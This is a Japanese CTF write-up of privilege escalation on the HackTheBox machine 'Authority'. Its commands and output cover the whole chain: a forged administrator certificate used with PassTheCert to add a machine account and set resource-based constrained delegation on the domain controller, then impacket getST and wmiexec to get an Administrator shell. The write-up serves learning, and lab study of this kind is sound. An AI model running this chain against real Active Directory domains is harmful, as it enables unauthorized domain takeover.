なので、別のプロトコルに対して偽装した証明書で悪さしようという考えになる。TLSを利用している認証はLDAPSなどがある。このプロトコルを使って攻撃しようといった考えですな。
この考え方については以下のPassTheCertのドキュメントに詳しく記載されているので読んでみればいいかなと思う。
ここらのドキュメントに攻撃の具体的な実施方法(上記ではResource-Based Constrained Delegation攻撃)も記載されている。マシン作成ができ、_msDS-AllowedToActOnBehalfOfOtherIdentity_の設定も証明書があるのでうまくいきそう。試す価値はあるとみる。RBCD攻撃については以下を参考にして欲しい。
まずはこの攻撃を実施するためにPassTheCert.exeを入手する。以下リポジトリからバイナリを拝借。
PassTheCert実施
Administratorを騙るDESKTOP-1337$を作成する。
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> .\PassTheCert.exe --server 127.0.0.1 --cert-path C:\Users\svc_ldap\Documents\administrator.pfx --add-computer --computer-name DESKTOP-1337$
No password given, generating random one.
Generated password: 99U1VOMhRX6LEvISJJQ9PMo07osUJLcp
Success
ドメインコントローラーauthorityのディレクトリツリーを確認するために以下コマンドを打つ。
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> Get-DomainComputer authority
pwdlastset : 6/22/2023 2:29:41 PM
logoncount : 1322
msds-generationid : {164, 41, 7, 98...}
serverreferencebl : CN=AUTHORITY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=authority,DC=htb
badpasswordtime : 12/31/1600 7:00:00 PM
msds-additionaldnshostname : {authority.htb.corp, AUTHORITY}
distinguishedname : CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb
objectclass : {top, person, organizationalPerson, user...}
displayname : AUTHORITY$
lastlogontimestamp : 7/18/2023 8:30:26 PM
name : AUTHORITY
primarygroupid : 516
objectsid : S-1-5-21-622327497-3269355298-2248959698-1000
samaccountname : AUTHORITY$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
whenchanged : 7/19/2023 10:42:41 AM
accountexpires : NEVER
cn : AUTHORITY
operatingsystem : Windows Server 2019 Standard
instancetype : 4
msdfsr-computerreferencebl : CN=AUTHORITY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,CN=System,DC=authority,DC=htb
objectguid : 23c88ddb-c76e-41bd-8b75-dd04e08431cc
operatingsystemversion : 10.0 (17763)
lastlogoff : 12/31/1600 7:00:00 PM
msds-allowedtoactonbehalfofotheridentity : {1, 0, 4, 128...}
こいつのmsDS-AllowedToActOnBehalfOfOtherIdentityに作成したDESKTOP-1337$のSIDを追加します。
そのためにSIDを確認しておきます。
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> Get-DomainComputer DESKTOP-1337
pwdlastset : 7/19/2023 7:14:53 AM
logoncount : 0
badpasswordtime : 12/31/1600 7:00:00 PM
distinguishedname : CN=DESKTOP-1337,CN=Computers,DC=authority,DC=htb
objectclass : {top, person, organizationalPerson, user...}
name : DESKTOP-1337
objectsid : S-1-5-21-622327497-3269355298-2248959698-12106
samaccountname : DESKTOP-1337$
localpolicyflags : 0
codepage : 0
samaccounttype : MACHINE_ACCOUNT
accountexpires : NEVER
countrycode : 0
whenchanged : 7/19/2023 11:14:53 AM
instancetype : 4
usncreated : 266585
objectguid : 41ecd55b-1ede-450f-bbc3-440d73db785f
lastlogoff : 12/31/1600 7:00:00 PM
objectcategory : CN=Computer,CN=Schema,CN=Configuration,DC=authority,DC=htb
dscorepropagationdata : 1/1/1601 12:00:00 AM
serviceprincipalname : {RestrictedKrbHost/DESKTOP-1337.authority.htb, RestrictedKrbHost/DESKTOP-1337, HOST/DESKTOP-1337.authority.htb, HOST/DESKTOP-1337}
lastlogon : 12/31/1600 7:00:00 PM
badpwdcount : 0
cn : DESKTOP-1337
useraccountcontrol : WORKSTATION_TRUST_ACCOUNT
whencreated : 7/19/2023 11:14:53 AM
primarygroupid : 515
iscriticalsystemobject : False
usnchanged : 266587
dnshostname : DESKTOP-1337.authority.htb
よし、確認できたのでDESKTOP-1337$のSIDを追加します。
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> .\PassTheCert.exe --server 127.0.0.1 --cert-path C:\Users\svc_ldap\Documents\administrator.pfx --rbcd --target "CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb" --sid "S-1-5-21-622327497-3269355298-2248959698-12106"
msDS-AllowedToActOnBehalfOfOtherIdentity attribute exists. Saving old value to disk.
You can restore it using arguments:
--target "CN=AUTHORITY,OU=Domain Controllers,DC=authority,DC=htb" --restore CN=AUTHORITY,OU=Domain_Controllers,DC=authority,DC=htb_msDS-AllowedToActOnBehalfOfOtherIdentity_20230719T071538Z.txt
Success
後はRBCD攻撃を実施するだけです。
RBCD攻撃
MS-SFU Kerberosの拡張機能(S4U)を使ってTGSからサービスチケット(ST)をゲットしに行きます。
impacketのgetServiceTicketで制約付き委任の代理要求を行えるので便利です。
┌──(root㉿kali)-[~/work]
└─# impacket-getST -spn 'cifs/authority.authority.htb' -impersonate Administrator 'authority.htb/DESKTOP-1337$:99U1VOMhRX6LEvISJJQ9PMo07osUJLcp'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache
Administrator.ccacheにSTが格納されているので、これを環境変数に埋め込みます。
┌──(root㉿kali)-[~/work]
└─# export KRB5CCNAME=Administrator.ccache
cifsへのSTが手に入ったのでそのまま突撃します。
┌──(root㉿kali)-[~/work]
└─# impacket-wmiexec -k -no-pass authority.htb/Administrator@authority.authority.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] SMB SessionError: STATUS_MORE_PROCESSING_REQUIRED({Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete.)
ぐぬぬ、、、時刻を修正する。
┌──(root㉿kali)-[~/work]
└─# ntpdate 10.129.7.87
2023-07-19 07:17:42.120146 (-0400) +14397.602014 +/- 0.123917 10.129.7.87 s1 no-leap
CLOCK: time stepped by 14397.602014
これの流れを何度か繰り返してやっと入ることが出来ました。
┌──(root㉿kali)-[~/work]
└─# impacket-wmiexec -k -no-pass authority.htb/Administrator@authority.authority.htb
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>
Administrator権限ゲットだぜ!!!
まとめ
これで特権昇格に成功し、Administrator権限を奪取できました。
脆弱性を発見してからの悪用が難しく、PassTheCertのよい勉強になります。
後半の内容である権限昇格にADCSを悪用する方法はLTで発表した以下資料もあるので参考にしてみてください。
個人的にEscapeの上位互換のBoxだと感じました。
Hardでは????
明日は@takao-hさんです。